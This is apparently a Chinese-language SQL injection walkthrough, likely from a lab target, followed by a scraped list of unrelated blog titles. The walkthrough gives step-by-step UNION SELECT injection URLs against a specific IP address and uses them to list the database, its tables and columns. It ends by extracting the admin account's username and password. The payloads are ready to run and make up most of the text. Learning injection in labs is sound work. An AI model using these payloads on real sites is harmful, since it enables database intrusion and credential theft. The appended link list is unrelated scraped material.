查相关内容(一定要在回显点处查看!)

查数据库名

http://120.203.13.75:6815/index.php?id=1 and 1=2 union select 1,database()

查数据库版本(mysql>5.0,5.0 以后的版本才有information_schema, information_schema存储着数据库名、表名、列的数据类型、访问权限等)

http://120.203.13.75:6815/index.php?id=1 and 1=2 union select 1,version()

查表名

http://120.203.13.75:6815/index.php?id=1 and 1=2 union select 1,table_name from information_schema.tables where table_schema=database() limit 0,1

查字段名

http://120.203.13.75:6815/index.php?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name='admin' limit 0,1

http://120.203.13.75:6815/index.php?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name='admin' limit 1,1

http://120.203.13.75:6815/index.php?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name='admin' limit 2,1

查出 admin 表里 有 id username password 三个字段

查询字段内容

构造

?id=1 and 1=2 union select 1,username from admin limit 0,1

构造

?id=1 and 1=2 union select 1,password from admin limit 1,1

limit 1,1 没有回显,说明只有一个用户

构造

?id=1 and 1=2 union select 1,password from admin limit 0,1

如此,得到了管理员账号和密码

SQL注入 mysql4.0版本_SQL注入(上)相关推荐

  1. sql注入空格被过滤_SQL注入:各种绕过检测的姿势

    这一篇主要总结一下sqlilabs中advanced injection中的用到的各种绕过,也就是less21-less38. 目录 1)数据编码 2)特殊字符.语法关键字过滤 3)存储型注入 4)特 ...

  2. 情侣小程序2.0版本已提上日程

    开发背景 最初的想法只是为了记录一些账单信息,后面随着女朋友的需求增多,这个小程序也就慢慢地多了一些"奇奇怪怪"的功能,目前已投入实际使用. 代码格式奇怪的原因 看过源码的同学们可 ...

  3. mysql注入绕过单引号_SQL注入-绕过过滤规则

    过滤规则产生的原因 前两篇举例了SQL注入Get请求/SQL注入Post请求的案例,都是因为程序要接收用户输入的变量或者URL传递的参数,并且参数或变量会被组成 SQL语句的一部分被执行.这些数据我们 ...

  4. 链上天眼2.0版本上线,欧科云链深耕区块链大数据产业成绩斐然

    4 月 21 日,欧科云链发布了面向全体用户的链上天眼2.0版本.链上天眼是欧科云链在2020年9月发布的一款链上数据监测和交易行为可视化工具,专注于链上数据的追踪和监控,提供交易图谱.地址查询和地址 ...

  5. sqlserver evaluation是什么版本_SQL Server 基础知识

    目录 什么是 SQL Server? 安装 关键概念 系统数据库(System Databases) 登录名与数据库用户(Login and user) 身份验证模式(Authentication M ...

  6. Microsoft SQL Server2000 四个版本的区别及下载地址

    我们经常看到网路上有MS SQL 2000  4和1的版本下载,这四个版本到底有什么区别呢下面我们来详细看一下微软对于这四个版本的定位. 对于新接触SQL数据库的人来说,类似这几个问题的有关于SQL版 ...

  7. 微软研究院和清华大学联合发布 “开放学术图谱(OAG)2.0版本”

    来源:微软研究院AI头条 本文约3000字,建议阅读5分钟. 本文为你介绍了最新发布的开放学术图谱2.0版本. [导 读]开放学术组织(Open Academic Society)是由微软.清华.艾伦 ...

  8. Unity答题系统3.0版本(增加题目导航栏和提交后显示题目正误标识功能)

    目录导航 答题系统修改说明 答题界面搭建 核心脚本代码 运行效果 答题系统修改说明 1.3.0版本的答题系统同样延续了前两个版本一样的方式,题库信息存储在xml文档中,通过www的形式加载并解析,构建 ...

  9. Silverlight WebOS案例2.0版本(基于Silverlight4开发的Web操作系统)

    这是一套基于Silverlight开发的WEBOS 2.0版本,在本团队为中国移动完成第一版WebOS 1.0版本的基础上,再次开发了第二版的WebOS,本版本与第一个版本技术架构完全不同,界面功能也 ...

最新文章

  1. Mybatis传递多个参数的4种方式
  2. Opencv3.0+vs2015
  3. 转换环境与执行环境、宿主环境与独立环境、宿主实现与独立实现
  4. 实时计算 Flink性能调优
  5. python进阶-Python 进阶用法 (持续更新)
  6. 一睹为快 | 施耐德电气全生命周期智能制造解决方案亮相线上工博
  7. 快学Scala习题解答—第三章 数组相关操作
  8. 如何制作一个类似Tiny Wings的游戏 Cocos2d-x 2 1 4
  9. 第一阶段冲刺 第三天
  10. D16 Group Decimort 2 Mac - 经典复古采样器
  11. Netspark自动批量扫描powershell脚本
  12. Tomcat9-默认登录名/密码
  13. Matlab-数值计算方法作业
  14. 计算机大作业的范本,计算机应用基础大作业.doc
  15. Excel批量生成条形码
  16. C语言中abs和fabs的区别
  17. .Net 常用的ORM框架
  18. 组件封装 - steps组件
  19. 学习数据库MySQL
  20. PTA乙级-1061 判断题-C语言版

热门文章

  1. 美团败诉,赔偿饿了么 100 万元;华为 Mate X2 首发秒没;库克获 8 亿年终奖 | 极客头条...
  2. 每位开发人员都应该阅读的优秀源代码,长啥样?
  3. 代码没写完,哪里有脸睡觉!17 张程序员壁纸推荐
  4. DDoS 攻击爆发!医疗在线教育成重点,代理攻击成常态
  5. 2019 谷歌年度搜索关键词揭晓,技术宅的英雄梦!
  6. 从开源开发者身上学到的 5 种品质
  7. 传 ofo 年底裁员超 50%;Vivo 支持谷歌 Fuchsia OS;Spring Boot 2.2.2 发布 | 极客头条
  8. 如何在 Simulink 中使用 PID Tuner 进行 PID 调参?
  9. 互联网公司上演反腐风暴;GitHub CEO 对断供表示无能为力;程序员面试锦集| 开发者周刊...
  10. 将 30 万行代码从 Flow 迁移到 TypeScript 是一种怎样的体验?